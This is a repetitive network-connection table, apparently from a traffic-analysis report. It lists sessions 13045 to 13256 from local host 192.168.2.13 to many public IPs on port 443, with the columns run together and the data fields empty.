                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13045192.168.2.1357416173.34.189.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13046192.168.2.1356754100.208.218.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13047192.168.2.135247038.99.26.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13048192.168.2.135044860.226.71.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13049192.168.2.135572095.87.184.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13050192.168.2.134390649.244.185.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13051192.168.2.1357586222.4.16.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13052192.168.2.133745485.32.37.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13053192.168.2.133485885.222.189.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13054192.168.2.134198452.240.64.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13055192.168.2.134739691.226.30.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13056192.168.2.134436261.254.82.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13057192.168.2.133966497.255.128.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13058192.168.2.1359846194.249.175.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13059192.168.2.135170248.108.37.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13060192.168.2.133447249.75.175.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13061192.168.2.1337350185.191.137.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13062192.168.2.1351708109.140.48.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13063192.168.2.1352744162.104.220.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13064192.168.2.1348614195.173.45.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13065192.168.2.135009264.223.135.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13066192.168.2.1350416158.53.250.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13067192.168.2.1343114217.64.54.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13068192.168.2.1352054202.130.232.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13069192.168.2.133641257.166.65.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13070192.168.2.1354966216.114.147.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13071192.168.2.1334588138.170.219.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13072192.168.2.1335390207.16.31.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13073192.168.2.133361032.197.94.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13074192.168.2.1348168205.115.16.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13075192.168.2.1349536217.112.207.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13076192.168.2.133637690.138.43.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13077192.168.2.1345562209.34.36.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13078192.168.2.133972080.7.19.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13079192.168.2.133528045.72.128.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13080192.168.2.133519672.7.52.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13081192.168.2.1338324218.22.157.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13082192.168.2.13517201.211.122.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13083192.168.2.13445509.86.208.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13084192.168.2.1336632149.193.220.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13085192.168.2.1358526123.138.46.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13086192.168.2.1333590106.160.232.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13087192.168.2.134945854.3.190.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13088192.168.2.133286443.3.245.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13089192.168.2.135845643.16.30.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13090192.168.2.1346032143.184.33.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13091192.168.2.133538436.184.36.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13092192.168.2.135222890.62.143.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13093192.168.2.1359770200.74.44.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13094192.168.2.1346212152.149.149.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13095192.168.2.1352320119.103.245.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13096192.168.2.1345584180.64.180.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13097192.168.2.1358102160.152.135.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13098192.168.2.1359702111.7.139.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13099192.168.2.1352714132.63.111.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13100192.168.2.1354388137.34.21.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13101192.168.2.135471250.246.232.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13102192.168.2.135527446.204.120.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13103192.168.2.1350378152.60.82.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13104192.168.2.133453669.16.37.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13105192.168.2.135310664.162.127.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13106192.168.2.1353790180.172.210.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13107192.168.2.1346042105.35.55.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13108192.168.2.1348114175.243.162.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13109192.168.2.1336656207.169.200.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13110192.168.2.1357332148.10.189.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13111192.168.2.1342084161.133.235.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13112192.168.2.135004213.63.30.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13113192.168.2.135623287.64.214.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13114192.168.2.134453099.56.82.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13115192.168.2.1357288120.211.117.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13116192.168.2.134069836.26.38.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13117192.168.2.1353434203.219.160.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13118192.168.2.133864665.96.234.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13119192.168.2.134521698.179.19.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13120192.168.2.133867245.195.37.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13121192.168.2.1355926169.170.194.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13122192.168.2.135629290.208.201.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13123192.168.2.135821690.96.62.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13124192.168.2.13531169.232.194.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13125192.168.2.1335134141.226.177.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13126192.168.2.135034471.193.203.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13127192.168.2.136001852.170.132.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13128192.168.2.1335474144.124.13.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13129192.168.2.1343088120.131.167.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13130192.168.2.1344782217.216.214.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13131192.168.2.135522449.237.130.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13132192.168.2.1353542184.108.33.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13133192.168.2.134688427.6.148.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13134192.168.2.134504649.112.179.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13135192.168.2.133420698.83.122.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13136192.168.2.1334728156.194.138.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13137192.168.2.133323275.228.27.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13138192.168.2.1341988136.27.83.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13139192.168.2.1355484140.83.192.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13140192.168.2.134487272.181.52.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13141192.168.2.134325049.174.200.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13142192.168.2.134217488.250.222.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13143192.168.2.1354148167.173.206.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13144192.168.2.135446453.120.144.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13145192.168.2.1333518113.153.143.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13146192.168.2.133434467.18.248.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13147192.168.2.1347558152.153.71.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13148192.168.2.1351030125.101.222.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13149192.168.2.1352402170.230.77.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13150192.168.2.135268086.127.10.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13151192.168.2.136068634.243.215.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13152192.168.2.1341136155.243.194.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13153192.168.2.1351422176.80.131.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13154192.168.2.1348290138.88.73.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13155192.168.2.1360560177.170.205.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13156192.168.2.1341998128.109.97.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13157192.168.2.1346058129.45.123.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13158192.168.2.1340682188.59.191.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13159192.168.2.1352522125.103.254.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13160192.168.2.134065014.117.51.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13161192.168.2.1360668139.43.247.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13162192.168.2.134390468.49.214.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13163192.168.2.1348476166.103.245.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13164192.168.2.1357830130.123.254.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13165192.168.2.1350348176.124.166.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13166192.168.2.1335050200.149.243.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13167192.168.2.1339952190.238.202.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13168192.168.2.1349262217.136.183.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13169192.168.2.133995098.2.97.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13170192.168.2.1350916168.59.21.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13171192.168.2.133352240.104.95.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13172192.168.2.1341790137.232.147.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13173192.168.2.1352968119.255.145.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13174192.168.2.134368241.241.59.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13175192.168.2.1356182171.191.219.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13176192.168.2.1332948142.142.146.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13177192.168.2.134283276.174.206.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13178192.168.2.13383368.221.39.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13179192.168.2.1359352181.127.237.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13180192.168.2.134299687.239.149.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13181192.168.2.1348846121.209.166.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13182192.168.2.1360230100.217.189.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13183192.168.2.135699824.247.238.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13184192.168.2.1339662156.113.238.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13185192.168.2.135228095.79.139.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13186192.168.2.1338024171.233.186.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13187192.168.2.13539604.37.177.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13188192.168.2.133473299.236.251.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13189192.168.2.134176268.62.70.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13190192.168.2.133636897.3.241.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13191192.168.2.1353044112.154.179.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13192192.168.2.135217678.98.87.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13193192.168.2.1360718143.24.94.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13194192.168.2.1340314211.248.45.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13195192.168.2.1346884105.179.209.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13196192.168.2.1353566198.127.146.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13197192.168.2.1353588213.78.159.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13198192.168.2.1341202197.215.24.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13199192.168.2.134963883.93.160.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13200192.168.2.1347528112.46.69.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13201192.168.2.1335830147.140.39.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13202192.168.2.1348900145.154.169.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13203192.168.2.134744657.237.93.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13204192.168.2.1338070161.64.178.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13205192.168.2.1355352106.125.237.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13206192.168.2.135338240.137.17.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13207192.168.2.134725453.102.25.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13208192.168.2.1343922191.129.69.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13209192.168.2.1358752163.5.99.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13210192.168.2.135670813.133.182.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13211192.168.2.133475084.78.176.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13212192.168.2.13521105.64.102.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13213192.168.2.1335794183.164.50.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13214192.168.2.1359532126.217.120.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13215192.168.2.1350900153.96.199.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13216192.168.2.1351712188.103.30.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13217192.168.2.1357928192.29.100.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13218192.168.2.1345200185.135.169.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13219192.168.2.1336536187.216.238.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13220192.168.2.1358766128.14.144.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13221192.168.2.135690479.144.8.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13222192.168.2.135487295.59.47.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13223192.168.2.135770882.198.202.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13224192.168.2.1336626104.132.218.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13225192.168.2.1356084180.57.25.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13226192.168.2.134264297.18.217.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13227192.168.2.1358230152.19.57.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13228192.168.2.134018848.113.0.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13229192.168.2.1344610178.142.97.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13230192.168.2.1345252144.105.19.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13231192.168.2.13461345.217.0.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13232192.168.2.1358538166.43.67.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13233192.168.2.1336710158.68.205.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13234192.168.2.1334532161.208.129.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13235192.168.2.134653492.128.14.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13236192.168.2.1357710182.40.203.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13237192.168.2.1332962164.255.83.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13238192.168.2.1332870179.71.33.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13239192.168.2.1341812107.47.167.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13240192.168.2.135233688.81.248.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13241192.168.2.1357134178.179.3.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13242192.168.2.1337210220.223.18.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13243192.168.2.1348362204.216.6.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13244192.168.2.1334184196.214.150.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13245192.168.2.133666666.207.128.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13246192.168.2.1340790156.229.105.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13247192.168.2.133712014.90.109.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13248192.168.2.1350064123.163.93.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13249192.168.2.134200294.43.170.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13250192.168.2.134419681.208.179.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13251192.168.2.134375696.240.118.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13252192.168.2.1358682158.139.60.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13253192.168.2.133603888.108.30.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13254192.168.2.1346208153.24.48.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13255192.168.2.1338308141.39.190.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13256192.168.2.1336308220.49.18.179443
                                                  TimestampBytes transferredDirectionData


